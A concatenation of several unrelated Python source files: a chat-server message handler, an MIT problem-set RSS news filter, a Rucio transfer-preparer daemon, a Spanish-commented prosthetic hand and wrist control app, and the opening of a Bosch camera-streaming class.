# This function is used to add the posted message to the log file
def msg(client_sock, info, username):
global msgseq
global msglogall
# We need seq number, timestamp, and edited info so we can write into the file
msgseq += 1
currtime = dt.datetime.now()
date_time = currtime.strftime("%d %b %Y %H:%M:%S")
edited = 'no'
# save them into the list (for later use)
entry = '; ' + date_time + '; ' + username + '; ' + info + '; ' + edited + '\n'
msglogall.append(entry)
# Write this message into the file
logentry = str(msgseq) + '; ' + date_time + '; ' + username + '; ' + info + '; ' + edited + '\n'
f = open('messagelog.txt', 'a')
f.write(logentry)
f.close()
# Send a confirm message to the user and print this operation
confirm = str(msgseq) + ' ' + date_time
client_sock.send(confirm.encode('utf-8'))
servermsg = username + ' posted MSG #' + str(msgseq) + ' ' + '"' + info + '"' + ' at ' + date_time + '\n'
print(servermsg)
# This function is used to delete the message
def dlt(client_sock, times, seq, user):
global msglogall
global msgseq
date_time = dt.datetime.now()
currtime = date_time.strftime("%d %b %Y %H:%M:%S")
# First, we check if the sequence number of the message is valid
seq = int(seq)
seq = seq - 1
if seq >= len(msglogall) or seq < 0:
print(user + " trys to delete MSG #" + str(
seq + 1) + " at " + currtime + " but failed. Reason: Invalid sequence number\n")
client_sock.send('Seq'.encode('utf-8'))
return
# If seq is correct, we check the user
entry = msglogall[seq].split('; ')
if entry[2] != user:
print(
user + " trys to delete MSG #" + str(
seq + 1) + " at " + currtime + " but failed. Reason: Authorisation fails\n")
client_sock.send('User'.encode('utf-8'))
return
# Then timestamp
if entry[1] != times:
print(user + " trys to delete MSG #" + str(
seq + 1) + " at " + currtime + " but failed. Reason: Invalid timestamp\n")
client_sock.send('Timestamp'.encode('utf-8'))
return
# All matches. We delete the message
del msglogall[seq]
msgseq -= 1
print(user + " deletes MSG #" + str(seq + 1) + " at " + currtime + "\n")
client_sock.send('Delete'.encode('utf-8'))
client_sock.send(currtime.encode('utf-8'))
# Write the updated msg list into the file (All the index will now automatically corrected
f = open('messagelog.txt', 'w')
index = 0
for i in msglogall:
index += 1
f.write(str(index) + i)
f.close()
# This function is used to edit the posted message
# Very similar to DLT
def edt(client_sock, times, seq, user, msge):
global msglogall
date_time = dt.datetime.now()
currtime = date_time.strftime("%d %b %Y %H:%M:%S")
# First, we check if the sequence number of the message is valid
seq = int(seq)
seq = seq - 1
if seq >= len(msglogall) or seq < 0:
print(user + " trys to edit MSG #" + str(
seq + 1) + " at " + currtime + " but failed. Reason: Invalid sequence number\n")
client_sock.send('Seq'.encode('utf-8'))
return
# If seq is correct, we check the user
entry = msglogall[seq].split('; ')
if entry[2] != user:
print(
user + " trys to edit MSG #" + str(
seq + 1) + " at " + currtime + " but failed. Reason: Authorisation fails\n")
client_sock.send('User'.encode('utf-8'))
return
# Then timestamp
if entry[1] != times:
print(user + " trys to edit MSG #" + str(
seq + 1) + " at " + currtime + " but failed. Reason: Invalid timestamp\n")
client_sock.send('Timestamp'.encode('utf-8'))
return
# All matches. We delete the message
msglogall[seq] = '; ' + currtime + '; ' + user + '; ' + msge + '; ' + 'Yes' + '\n'
print(user + " edit MSG #" + str(seq + 1) + ' ' + '"' + msge + '"' + " at " + currtime + "\n")
confirm = 'Edit ' + currtime
client_sock.send(confirm.encode('utf-8'))
# Write the updated msg list into the file (All the index will now automatically corrected
f = open('messagelog.txt', 'w')
index = 0
for i in msglogall:
index += 1
f.write(str(index) + i)
f.close()
# This is the implementation of the rdm function
def rdm(times):
global msglogall
index = 0
result = ''
# We went through every element in the msglogall list
# It contains all the information in the messagelog.txt
for entry in msglogall:
index += 1
entrylist = entry.split('; ')
stamp = entrylist[1]
# We can directly check if the time satisfy
if stamp > times:
result += str(index) + entry
# We have to go throuh the whole list becase there might be modified message with new time stamp
if result == '':
result = 'No new message since ' + times + '\n'
return result
# The atu command will tell you what is the current active user
def atu(user):
global userlog
result = ''
# If there is only one user (which is the user him/herself), return
if len(userlog) == 1:
result = 'No other active user\n'
print(result)
return result
index = 0
# Go through the whole list and skip the user him/herself
# Append the valid entry and finally return it
for i in userlog:
index += 1
listuser = i.split("; ")
if user == listuser[2]:
continue
else:
result += str(index) + i
print('Return the active user list:\n' + result)
return result
def out(user):
global userlog
global logseq
index = 0
# We need to find the user who wants to logout
# Delete this entry
for i in userlog:
listuser = i.split("; ")
if user == listuser[2]:
del userlog[index]
logseq -= 1
break
index += 1
# After we find the user and delete the file
# We need to update the userlog.txt
f = open('userlog.txt', 'w')
index = 0
for i in userlog:
index += 1
f.write(str(index) + i)
f.close()
# This is the main function
# We will have the socket, addr, and username as the argument
def recv_handler(con, addr, user):
global userlog
print('Server is ready for service')
while (1):
# Now we have passed the authentication part, we need to process the next command
allcommand = client_sock.recv(2048).decode('utf-8')
# The first three chars defines which function we need to call
# All the command are separated using space
command = allcommand[0:3]
# For MSG, the rest is the only argument
if command == 'MSG':
info = allcommand[4::]
msg(con, info, user)
# For DLT, there is seq number, times, username
elif command == 'DLT':
info = allcommand[4::]
info = info.split()
seq = info[0]
seq = seq.replace('#', '')
times = ' '.join(info[1::])
dlt(con, times, seq, user)
# For EDT, it is similar to DLT. Except there is the new messagee
elif command == 'EDT':
info = allcommand[4::]
info = info.split()
seq = info[0]
seq = seq.replace('#', '')
times = ' '.join(info[1:5])
msge = ' '.join(info[5::])
edt(con, times, seq, user, msge)
# For RDM, there is only the time stamp
elif command == 'RDM':
print(user + " issued RDM command.\n")
times = allcommand[4::]
returned = rdm(times)
client_sock.send(returned.encode('utf-8'))
print(returned)
# ATU and OUT does not take argument
elif command == 'ATU':
print(user + ' issued ATU command.\n')
info = atu(user)
print(info+"\n")
client_sock.send(info.encode('utf-8'))
# The UPD function can have everthing it need by calling ATU
elif command == 'UPD':
info = allcommand[4::]
# We need to find the user and if cannot find then send offline
isoffline = 'Offline'
for i in userlog:
listuser = i.split("; ")
if info == listuser[2]:
isoffline = listuser[3] + ' ' + listuser[4]
break
client_sock.send(isoffline.encode('utf-8'))
# This is the out command
elif command == 'OUT':
print(user + ' logged out\n')
out(user)
# Send an out message to the client
client_sock.send('out'.encode('utf-8'))
break
client_sock.close()
# we will use two sockets, one for sending and one for receiving
serverSocket = socket(AF_INET, SOCK_STREAM)
serverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
serverSocket.bind(('127.0.0.1', serverPort))
serverSocket.listen(5)
# The main thread
while True:
# Once a client enter, we record the socket and address and pass then to the authentication part
# If they pass the authentication, we will have a username represent this client
client_sock, client_addr = serverSocket.accept()
user = authentication(client_sock, client_addr)
# If the authentication passed, we start a new thread for the following command
# If not, we close the socket
if not user:
client_sock.close()
else:
# Prevent timing out
#serverSocket.setblocking(1)
thread = threading.Thread(target=recv_handler, args=(client_sock, client_addr, user,))
thread.start()
|
ps5.py
|
# 6.0001/6.00 Problem Set 5 - RSS Feed Filter
# Name: Alon Parag
# Collaborators:
# Time:From 04.01.2021 19:31 to 06.01.2021 13:18
# NOTE: TEST_3_BEFORE_AND_AFTER_TRIGGER FAILS AS THERE IS NOT TZINFO PASSED, TEST_3_ALT_BEFORE_AND_AFTER_TRIGGER PASSES
import feedparser
import string
import time
import threading
from project_util import translate_html
from mtTkinter import *
from datetime import datetime
import pytz
import string
import re
#-----------------------------------------------------------------------
#======================
# Code for retrieving and parsing
# Google and Yahoo News feeds
# Do not change this code
#======================
def process(url):
"""
Fetches news items from the rss url and parses them.
Returns a list of NewsStory-s.
"""
feed = feedparser.parse(url)
entries = feed.entries
ret = []
for entry in entries:
guid = entry.guid
title = translate_html(entry.title)
link = entry.link
description = translate_html(entry.description)
pubdate = translate_html(entry.published)
try:
pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %Z")
pubdate.replace(tzinfo=pytz.timezone("GMT"))
# pubdate = pubdate.astimezone(pytz.timezone('EST'))
# pubdate.replace(tzinfo=None)
except ValueError:
pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %z")
newsStory = NewsStory(guid, title, description, link, pubdate)
ret.append(newsStory)
return ret
#======================
# Data structure design
#======================
# Problem 1
# TODO: NewsStory
class NewsStory(object):
"""
Class to manipulate RSS feed News
Takes in
guid: string
title: string
description: string
link: string
pubdate: datetime
"""
def __init__(self, guid, title, description, link, pubdate):
try:
assert type(guid) == str, 'Error: guid should be of type str'
assert type(title) == str, 'Error: title should be of type str'
assert type(description) == str, 'Error: description should be of type str'
assert type(link) == str, 'Error: link should be of type str'
assert type(pubdate) == datetime, 'Error: pubdate should be of type datetime'
except AssertionError as identifier:
print(identifier)
except:
print('Unexpected Error occoured')
else:
self.__guid = guid
self.__title = title
self.__description = description
self.__link = link
self.__pubdate = pubdate
def get_guid(self):
"""Returns:
string representing GUid
"""
return self.__guid
def get_title(self):
"""Returns:
string representing title
"""
return self.__title
def get_description(self):
"""
Returns:
string representing desacription
"""
return self.__description
def get_link(self):
"""Returns:
string representing link
"""
return self.__link
def get_pubdate(self):
"""Returns:
datetime object representing pubdate
"""
return self.__pubdate
#======================
# Triggers
#======================
class Trigger(object):
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
# DO NOT CHANGE THIS!
raise NotImplementedError
# PHRASE TRIGGERS
# Problem 2
# TODO: PhraseTrigger
class PhraseTrigger(Trigger):
"""
docstring
"""
def __init__(self, phrase):
"""
Assumes:
phrase: alphabetic string
Returns:
instance of class PhraseTrigger
"""
try:
for char in string.punctuation:
assert char not in phrase, "Error, Phrase should be without the following charachters: " + string.punctuation
assert len(phrase.split(' ')) >= 1, "Error, String should have at least one word in it"
for e in phrase.split(' '):
assert len(e)>0, 'Error, spaces in phrase should be seperated by a single space'
except AssertionError:
pass
else:
self.__phrase = phrase.lower()
def is_phrase_in(self, text):
"""
Assumes:
text: string
Returns:
True if self.__phrase in text
otherwise False
"""
# remove punctuation and multiple spaces
text = re.sub('[!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~]', ' ', text)
text = re.sub('( )+', ' ', text).lower()
# check if phrase is in text
return True if re.search(r'\b%s\b' %self.__phrase, text) else False
# Problem 3
# TODO: TitleTrigger
class TitleTrigger(PhraseTrigger):
"""
Inherits from PhrasesTrigger, Fires when given phrase is in title
"""
def __init__(self, phrase):
"""
Assumes:
phrase is a alphabetic string
Returns:
a titleTrigger object
"""
PhraseTrigger.__init__(self, phrase)
def evaluate(self, story):
"""
Assumes:
story: NewsStory instance
Returns:
True if phrase in title, otherwise False
"""
title = story.get_title()
return self.is_phrase_in(title)
# Problem 4
# TODO: DescriptionTrigger
class DescriptionTrigger(PhraseTrigger):
"""
Inherits from PhrasesTrigger, Fires when given phrase is in Description
"""
def __init__(self, phrase):
"""
Assumes:
phrase is a alphabetic string
Returns:
a DescriptionTrigger object
"""
PhraseTrigger.__init__(self, phrase)
def evaluate(self, story):
"""
Assumes:
story: NewsStory instance
Returns:
True if phrase in Description, otherwise False
"""
description = story.get_description()
return self.is_phrase_in(description)
# TIME TRIGGERS
# Problem 5
# TODO: TimeTrigger
# Constructor:
# Input: Time has to be in EST and in the format of "%d %b %Y %H:%M:%S".
# Convert time from string to a datetime before saving it as an attribute.
class TimeTrigger(Trigger):
"""
abstract class for time triggers
"""
def __init__(self, time):
"""
Assumes:
time: datetime object with tzname "EST"
Returns:
TimeTrigger object
"""
try:
pattern = re.compile(r'([1-9]|(0[1-9])|([1-2][0-9])|(3[0-1]))\s[A-z][a-z]{2}\s[0-9]{4}\s(([2][0-3])|([0-1][0-9])):[0-5][0-9]:[0-5][0-9]')
assert bool(pattern.match(time)), 'Error, time should follow the pattern "01 Oct 2009 00:00:00"'
except AssertionError:
pass
else:
est = pytz.timezone('EST')
self.__time = datetime.strptime(time, r'%d %b %Y %H:%M:%S')
self.__time = self.__time.replace(tzinfo = est)
def get_time(self):
return self.__time
def evaluate(self, story):
"""
abstarct method, not to be implemented
"""
raise NotImplementedError
# Problem 6
# TODO: BeforeTrigger and AfterTrigger
class BeforeTrigger(TimeTrigger):
"""
TimeTrigger that fires when a NewsStory object pubdate is strictly before the given time
"""
def __init__(self, time):
super().__init__(time)
print('object:', self.__dict__)
print('trigger time:', self.get_time())
def is_before(self, time):
"""
Assumes:
time: datetime object tz=EST
Returns:
True if time is before self.get_time(), otherwise false
"""
return time<self.get_time()
def evaluate(self, story: NewsStory):
"""
Assumes:
story: NewsStory object
Returns:
True if NewsStory was published before self.get_time(), otherwise False
"""
return self.is_before(story.get_pubdate())
class AfterTrigger(TimeTrigger):
"""
TimeTrigger that fires when a NewsStory object pubdate is strictly after the given time
"""
def __init__(self, time):
super().__init__(time)
print('object:', self.__dict__)
print('trigger time:', self.get_time())
def is_after(self, time):
"""
Assumes:
time: datetime object tz=EST
Returns:
True if time is after self.get_time(), otherwise false
"""
return time>self.get_time()
def evaluate(self, story: NewsStory):
"""
Assumes:
story: NewsStory object
Returns:
True if NewsStory was published after self.get_time(), otherwise False
"""
return self.is_after(story.get_pubdate())
# COMPOSITE TRIGGERS
# Problem 7
# TODO: NotTrigger
class NotTrigger(Trigger):
"""
Reverts the output of a given triger
"""
def __init__(self, trigger: Trigger):
"""
Assumes:
trigger: an implementable Trigger class
Returns:
NotTrigger instance
"""
self.__trigger = trigger
def get_trigger(self):
"""
Returns:
Trigger object
"""
return self.__trigger
def evaluate(self, story):
"""
Assumes:
story: NewsStory object
Returns:
boolean inverse of the trigger attribute
"""
return not self.get_trigger().evaluate(story)
# Problem 8
# TODO: AndTrigger
class AndTrigger(Trigger):
"""
logical AND of two triggers
"""
def __init__(self, trigger_1: Trigger, trigger_2: Trigger):
"""
Assumes:
trigger: an implementable Trigger object
Returns:
AndTrigger instance
"""
self.__trigger_1 = trigger_1
self.__trigger_2 = trigger_2
def get_trigger_1(self):
"""
Returns:
Trigger_1 object
"""
return self.__trigger_1
def get_trigger_2(self):
"""
Returns:
Trigger_2 object
"""
return self.__trigger_2
def evaluate(self, story):
"""
Assumes:
story: NewsStory object
Returns:
boolean inverse of the trigger attribute
"""
return self.get_trigger_1().evaluate(story) and self.get_trigger_2().evaluate(story)
# Problem 9
# TODO: OrTrigger
class OrTrigger(Trigger):
"""
logical or of two triggers
"""
def __init__(self, trigger_1: Trigger, trigger_2: Trigger):
"""
Assumes:
trigger: an implementable Trigger class
Returns:
OrTrigger instance
"""
self.__trigger_1 = trigger_1
self.__trigger_2 = trigger_2
def get_trigger_1(self):
"""
Returns:
Trigger_1 object
"""
return self.__trigger_1
def get_trigger_2(self):
"""
Returns:
Trigger_2 object
"""
return self.__trigger_2
def evaluate(self, story):
"""
Assumes:
story: NewsStory object
Returns:
boolean operator OR of the two triggers
"""
return self.get_trigger_1().evaluate(story) or self.get_trigger_2().evaluate(story)
#======================
# Filtering
#======================
# Problem 10
def filter_stories(stories, triggerlist):
"""
Takes in a list of NewsStory instances.
Returns: a list of only the stories for which a trigger in triggerlist fires.
"""
# TODO: Problem 10
filtered_stories = []
for story in stories:
for trigger in triggerlist:
if trigger.evaluate(story):
filtered_stories.append(story)
return filtered_stories
#======================
# User-Specified Triggers
#======================
# Problem 11
def read_trigger_config(filename):
"""
filename: the name of a trigger configuration file
Returns: a list of trigger objects specified by the trigger configuration
file.
"""
# We give you the code to read in the file and eliminate blank lines and
# comments. You don't need to know how it works for now!
def create_trigger(trig_type,arg1, arg2=None):
"""
Assumes:
trig_type: str which is either TITLE, DESCRIPTION, AFTER, BEFORE, NOT, AND, OR
Returns:
correspoding trigger object
"""
if trig_type in 'TITLE':
return TitleTrigger(arg1)
elif trig_type in 'DESCRIPTION':
return DescriptionTrigger(arg1)
elif trig_type in 'AFTER':
return AfterTrigger(arg1)
elif trig_type in 'BEFORE':
return BeforeTrigger(arg1)
elif trig_type in 'NOT':
return NotTrigger(arg1)
elif trig_type in 'AND':
return AndTrigger(arg1, arg2)
elif trig_type in 'OR':
return OrTrigger(arg1, arg2)
trigger_file = open(filename, 'r')
lines = []
triggers_dict = {}
for line in trigger_file:
line = line.rstrip()
if not (len(line) == 0 or line.startswith('//')):
lines.append(line.split(','))
for line in lines:
if line[0] != 'ADD':
if not line[1] in ('NOT', 'AND', 'OR'):
triggers_dict[line[0]] = create_trigger(line[1], line[2])
else:
triggers_dict[line[0]]=create_trigger(line[1], triggers_dict[line[2]], triggers_dict[line[3]])
relevant_triggers = []
for trigger in lines[-1][1:]:
if trigger in triggers_dict.keys():
relevant_triggers.append(triggers_dict[trigger])
return relevant_triggers
SLEEPTIME = 120 #seconds -- how often we poll
def main_thread(master):
# A sample trigger list - you might need to change the phrases to correspond
# to what is currently in the news
try:
# t1 = TitleTrigger("election")
# t2 = DescriptionTrigger("Trump")
# t3 = DescriptionTrigger("Biden")
# t4 = AndTrigger(t2, t3)
# triggerlist = [t1, t4]
# Problem 11
# TODO: After implementing read_trigger_config, uncomment this line
# read_trigger_config('triggers.txt')
triggerlist = read_trigger_config('triggers.txt')
# HELPER CODE - you don't need to understand this!
# Draws the popup window that displays the filtered stories
# Retrieves and filters the stories from the RSS feeds
frame = Frame(master)
frame.pack(side=BOTTOM)
scrollbar = Scrollbar(master)
scrollbar.pack(side=RIGHT,fill=Y)
t = "Google & Yahoo Top News"
title = StringVar()
title.set(t)
ttl = Label(master, textvariable=title, font=("Helvetica", 18))
ttl.pack(side=TOP)
cont = Text(master, font=("Helvetica",14), yscrollcommand=scrollbar.set)
cont.pack(side=BOTTOM)
cont.tag_config("title", justify='center')
button = Button(frame, text="Exit", command=root.destroy)
button.pack(side=BOTTOM)
guidShown = []
def get_cont(newstory):
if newstory.get_guid() not in guidShown:
cont.insert(END, newstory.get_title()+"\n", "title")
cont.insert(END, "\n---------------------------------------------------------------\n", "title")
cont.insert(END, newstory.get_description())
cont.insert(END, "\n*********************************************************************\n", "title")
guidShown.append(newstory.get_guid())
while True:
print("Polling . . .", end=' ')
# Get stories from Google's Top Stories RSS news feed
stories = process("http://news.google.com/news?output=rss")
# Get stories from Yahoo's Top Stories RSS news feed
stories.extend(process("http://news.yahoo.com/rss/topstories"))
stories = filter_stories(stories, triggerlist)
list(map(get_cont, stories))
scrollbar.config(command=cont.yview)
print("Sleeping...")
time.sleep(SLEEPTIME)
except Exception as e:
print(e)
if __name__ == '__main__':
root = Tk()
root.title("Some RSS parser")
t = threading.Thread(target=main_thread, args=(root,))
t.start()
root.mainloop()
|
preparer.py
|
# -*- coding: utf-8 -*-
# Copyright 2020-2022 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Thomas Beermann <thomas.beermann@cern.ch>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021-2022
import functools
import logging
import threading
from time import time
from typing import TYPE_CHECKING
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.exception import RucioException
from rucio.common.logging import setup_logging
from rucio.core.request import preparer_update_requests, reduce_requests, sort_requests_minimum_distance, \
get_transfertool_filter, get_supported_transfertools, rse_lookup_filter, list_transfer_requests_and_source_replicas
from rucio.daemons.conveyor.common import run_conveyor_daemon
from rucio.db.sqla.constants import RequestState
if TYPE_CHECKING:
from typing import Optional
from sqlalchemy.orm import Session
from rucio.daemons.conveyor.common import HeartbeatHandler
graceful_stop = threading.Event()
def stop():
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1, sleep_time=10, bulk=100):
"""
Running the preparer daemon either once or by default in a loop until stop is called.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
def preparer_kwargs():
# not sure if this is needed for threading.Thread, but it always returns a fresh dictionary
return {'once': once, 'sleep_time': sleep_time, 'bulk': bulk}
threads = [threading.Thread(target=preparer, name=f'conveyor-preparer-{i}', kwargs=preparer_kwargs(), daemon=True) for i in range(threads)]
for thr in threads:
thr.start()
all_running = True
while all_running:
for thr in threads:
thr.join(timeout=3.14)
if not thr.is_alive() or graceful_stop.is_set():
all_running = False
break
if graceful_stop.is_set() or once:
logging.info('conveyor-preparer: gracefully stopping')
else:
logging.warning('conveyor-preparer: stopping out of the ordinary')
graceful_stop.set()
for thr in threads:
thr.join(timeout=3.14)
logging.info('conveyor-preparer: stopped')
def preparer(once, sleep_time, bulk, partition_wait_time=10):
# Make an initial heartbeat so that all instanced daemons have the correct worker number on the next try
logger_prefix = executable = 'conveyor-preparer'
run_conveyor_daemon(
once=once,
graceful_stop=graceful_stop,
executable=executable,
logger_prefix=logger_prefix,
partition_wait_time=partition_wait_time,
sleep_time=sleep_time,
run_once_fnc=functools.partial(
run_once,
bulk=bulk
),
activities=None,
)
def run_once(bulk: int = 100, heartbeat_handler: "Optional[HeartbeatHandler]" = None, session: "Optional[Session]" = None, **kwargs) -> bool:
if heartbeat_handler:
worker_number, total_workers, logger = heartbeat_handler.live()
else:
# This is used in tests
worker_number, total_workers, logger = 0, 0, logging.log
start_time = time()
try:
req_sources = list_transfer_requests_and_source_replicas(
total_workers=total_workers,
worker_number=worker_number,
limit=bulk,
request_state=RequestState.PREPARING,
session=session
)
if not req_sources:
count = 0
updated_msg = 'had nothing to do'
else:
transfertool_filter = get_transfertool_filter(lambda rse_id: get_supported_transfertools(rse_id=rse_id, session=session))
requests = reduce_requests(req_sources, [rse_lookup_filter, sort_requests_minimum_distance, transfertool_filter], logger=logger)
count = preparer_update_requests(requests, session=session)
updated_msg = f'updated {count}/{bulk} requests'
except RucioException:
logger(logging.ERROR, 'errored with a RucioException, retrying later', exc_info=True)
count = 0
updated_msg = 'errored'
logger(logging.INFO, '%s, taking %.3f seconds' % (updated_msg, time() - start_time))
queue_empty = False
if count < bulk:
queue_empty = True
return queue_empty
|
starpi_control_app.py
|
import cv2
import numpy as np
import math
import serial
from socket import *
import time
import threading
import sys
#se indica la direccion y puerto del servidor que recibe todo los datos
#el puerto por defecto es el 3001
socketInfo = ["localhost", 3001]
#funcion que estima el numero de dedos abiertos y cerrados en la mano a traves de la camara
#para imitar la pose en la la protesis robotica
def handPoseEstimation(socketInfo):
#se inicia la conexion con el servidor protocolo udp
socketCliente = socket(AF_INET, SOCK_DGRAM)
accionmano=""
lastestmano=0
#inicia la captura de video
cap = cv2.VideoCapture(0)
#bucle que captura y procesa cada frame entregado por la camara
while(cap.isOpened()):
#se lee el frame y se guarda en 2 variables
ret, img = cap.read()
#se cres un recuadro donde se buscara obtener los datos de la pose de mano
cv2.rectangle(img,(350,350),(90,90),(0,255,0),0)
crop_img = img[90:350, 90:350]
#se aplican filtros de color y difuminado
grey = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)
value = (35, 35)
blurred = cv2.GaussianBlur(grey, value, 0)
#se crea una vista de contraste threshold
_, thresh1 = cv2.threshold(blurred, 127, 255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)
cv2.imshow('Thresholded', thresh1)
#se buscan los contornos
contours, hierarchy = cv2.findContours(thresh1.copy(),cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
max_area = -1
#se guarda cada contorno
for i in range(len(contours)):
cnt=contours[i]
area = cv2.contourArea(cnt)
if(area>max_area):
max_area=area
ci=i
cnt=contours[ci]
#se dibuja un rectango con el area que contiene los contornos
x,y,w,h = cv2.boundingRect(cnt)
cv2.rectangle(crop_img,(x,y),(x+w,y+h),(0,0,255),0)
#se crea una malla alrededor uniendo los puntos de los contronos encontrados
hull = cv2.convexHull(cnt)
drawing = np.zeros(crop_img.shape,np.uint8)
cv2.drawContours(drawing,[cnt],0,(0,255,0),0)
cv2.drawContours(drawing,[hull],0,(0,0,255),0)
hull = cv2.convexHull(cnt,returnPoints = False)
defects = cv2.convexityDefects(cnt,hull)
count_defects = 0
cv2.drawContours(thresh1, contours, -1, (0,255,0), 3)
#se trasa lineas entre los puntos
for i in range(defects.shape[0]):
s,e,f,d = defects[i,0]
start = tuple(cnt[s][0])
end = tuple(cnt[e][0])
far = tuple(cnt[f][0])
a = math.sqrt((end[0] - start[0])**2 + (end[1] - start[1])**2)
b = math.sqrt((far[0] - start[0])**2 + (far[1] - start[1])**2)
c = math.sqrt((end[0] - far[0])**2 + (end[1] - far[1])**2)
angle = math.acos((b**2 + c**2 - a**2)/(2*b*c)) * 57
#si los angulos que generan las lineas son menores iguales a 90 se cuenta como un dedo encontrado
if angle <= 90:
count_defects += 1
cv2.circle(crop_img,far,1,[0,0,255],-1)
cv2.line(crop_img,start,end,[0,255,0],2)
#se define un accion deacuerdo al numero de dedos encontrados
if count_defects == 1:
accionmano="@"
elif count_defects == 2:
accionmano="#"
elif count_defects == 3:
accionmano="$"
elif count_defects == 4:
accionmano="%"
else:
accionmano="!"
#se envia el numero de dedos abiertos para replicar en la protesis se envia un nuevo valor solo si el numero de dedos cambia
if lastestmano!=accionmano:
socketCliente.sendto(accionmano.encode(), (socketInfo[0], socketInfo[1]))
lastestmano=accionmano
#print(accionmano)
time.sleep(0.2)
#se muentras las imagenes procesadas
cv2.imshow('Gesture', img)
all_img = np.hstack((drawing, crop_img))
cv2.imshow('Contours', all_img)
#se detiene la aplicacion al presinar la letra q o esc
k = cv2.waitKey(10)
if k == 27:
cv2.destroyAllWindows()
cap.release()
socketCliente.close()
break
#funcion que recibe los datos del acelerometro en la muneca para el control de la muneca de la protesis
def wristControl(socketInfo):
#se inicia la conexion con el servidor protocolo udp
socketCliente = socket(AF_INET, SOCK_DGRAM)
#se configura la conexion serial que recibira los datos del acelerometro enviados por el microcontrolador
#ser = serial.Serial('COM13', 38400) # Windows
ser = serial.Serial('/dev/ttyUSB0', 38400) # Linux Ubuntu
#bucle de control
while True:
#lee el comando recibido por puerto serie hasta el caracter finalizador "|" y envia los datos por socket al servidor de control
try:
comando = ser.read_until(b'|')
socketCliente.sendto(comando, (socketInfo[0], socketInfo[1]))
# se detiene la aplicacion con una interrupcion del teclado ctrl+c
except KeyboardInterrupt:
socketCliente.close()
ser.close()
print ("Interrupted")
sys.exit(0)
#se generan dos hilos para correr las dos funciones en paralelo para no aftera la velocidad de la lectura y procesamiento de datos
t1 = threading.Thread(target = handPoseEstimation,args=(socketInfo,))
t2 = threading.Thread(target = wristControl,args=(socketInfo,))
#se inician las funciones
t1.start()
t2.start()
|
camerastreamer.py
|
# Copyright (c) 2019, Bosch Engineering Center Cluj and BFMC organizers
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
import socket
import struct
import time
import numpy as np
from multiprocessing import Process
from threading import Thread
import cv2
from src.utils.templates.workerprocess import WorkerProcess
class CameraStreamer(WorkerProcess):
# ===================================== INIT =========================================
def __init__(self, inPs, outPs):
"""Process used for sending images over the network. UDP protocol is used. The
image is compressed before it is send.
Used for visualizing your raspicam from PC.
Parameters
----------
inPs : list(Pipe)
List of input pipes, only the first pipe is used to transfer the captured frames.
outPs : list(Pipe)
List of output pipes (not used at the moment)
"""
super(CameraStreamer,self).__init__( inPs, outPs)
self.serverIp = '192.168.1.102' # PC ip
self.port = 2244 # com port
# ===================================== RUN ==========================================
def run(self):
"""Apply the initializing methods and start the threads.
"""
self._init_socket()
super(CameraStreamer,self).run()
# ===================================== INIT THREADS =================================
def _init_threads(self):
"""Initialize the sending thread.
"""
if self._blocker.is_set():
return
streamTh = Thread(name='StreamSending',target = self._send_thread, args= (self.inPs[0], ))
streamTh.daemon = True
self.threads.append(streamTh)
# ===================================== INIT SOCKET ==================================
def _init_socket(self):
"""Initialize the socket.
"""
self.client_socket = socket.socket()
self.connection = None
# Trying repeatedly to connect the camera receiver.
try:
while self.connection is None and not self._blocker.is_set():
try:
self.client_socket.connect((self.serverIp, self.port))
self.client_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.connection = self.client_socket.makefile('wb')
except ConnectionRefusedError as error:
time.sleep(0.5)
pass
except KeyboardInterrupt:
self._blocker.set()
pass
# ===================================== SEND THREAD ==================================
def _send_thread(self, inP):
"""Sending the frames received thought the input pipe to remote client by using a socket.
Parameters
----------
inP : Pipe
Input pipe to read the frames from other process.
"""
